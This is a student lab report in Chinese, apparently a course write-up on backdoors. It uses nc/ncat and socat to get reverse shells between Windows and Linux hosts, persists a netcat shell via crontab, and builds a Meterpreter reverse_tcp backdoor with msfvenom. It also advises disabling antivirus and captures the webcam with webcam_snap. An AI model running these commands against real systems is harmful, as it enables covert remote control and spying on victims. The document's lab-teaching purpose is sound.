20155307《网络对抗》——后门原理与实践

实验过程(基本后门工具实践)

  • Win获取Linux shell

  • Linux获取Win shell

  • 使用nc传输数据

  • 4nc定时启动

  • 实践SoCat的功能

  • 实践MSF Meterpreter功能

  • 1、Win获取Linux shell
    首先查看一下本机的ip,然后解压拷过来的ncat压缩包,在cmd中进入ncat文件夹中,使用ncat.exe -l -p 5307命令运行ncat.exe监听5307端口。

    说着我就想使用nc Win的IP 端口号 -e /bin/sh命令去连接一下Win的5307端口,果不其然,连接成功后就可以在Win的cmd窗口中输入Linux命令,获取了Linux的shell。

  • 2、Linux获取Win shell
    Linux在终端中查看自己的IP,

    Linux使用nc -l -p 5307命令监听5307端口。
    Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去连接Linux的5307端口,连接成功后就可以在Linux的终端窗口中输入Win的命令,此时已经获取了Win的shell。

  • 3、使用nc传输数据
    Win使用ncat.exe -l 5305命令监听5305端口。Linux在终端窗口使用nc Win的IP 端口号命令去连接Win的5305端口,然后就可以双向传输数据了。

  • 4、nc定时启动
    Win使用ncat.exe -l -p 5307命令运行ncat.exe监听5307端口。Linux使用crontab -e命令,在最后一行添加分钟数 * * * * /bin/netcat Win的IP 端口 -e /bin/sh,在每个小时的这个分钟反向连接Windows主机的端口。

    15分时Win获得了Linux的shell,可以显示想要获取的东西,

  • 5、实践SoCat的功能
    在Windows下,依次打开控制面板--管理工具--任务计划程序,然后选择创建一个新任务,填写好任务名称(eg20155307);新建一个触发器,并设置触发器的相关参数;新建操作,设置如图相关参数tcp-listen:端口号exec:cmd.exe,pty,stderr,按照老师的要求下载socat.exe。
    Linux下使用socat - tcp:Win的IP:端口命令,此时已经获取了Win的shell,可以查看想知道的东西。

  • 6、实践MSF Meterpreter功能
    使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20155307_backdoor.exe命令生成后门。

    将后门传送到Win主机上,遇到杀毒软件要精确将你自己的后门恢复添加信任区,或者直接关闭杀毒软件,

    在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp,继续设置IP(此处设置虚拟机的Linux的IP地址)和端口,Linux使用exploit命令开始监听,此时在Win上执行后门程序。

Linux已经和Win连接好了,那么我们尝试一下拍照功能吧~
使用命令:webcam_snap


实验总结与体会
做了这次实验,我倒是有一点好像自己很厉害的感觉。但是我觉得离电影里面黑客们的操作比起来还是望其项背。我们今天学了免杀,感觉更加高大上了——我再试一试设计可以骗过杀毒软件的恶意代码。

原文地址:https://www.cnblogs.com/zhuanyedajiesanshinian/p/8707971.html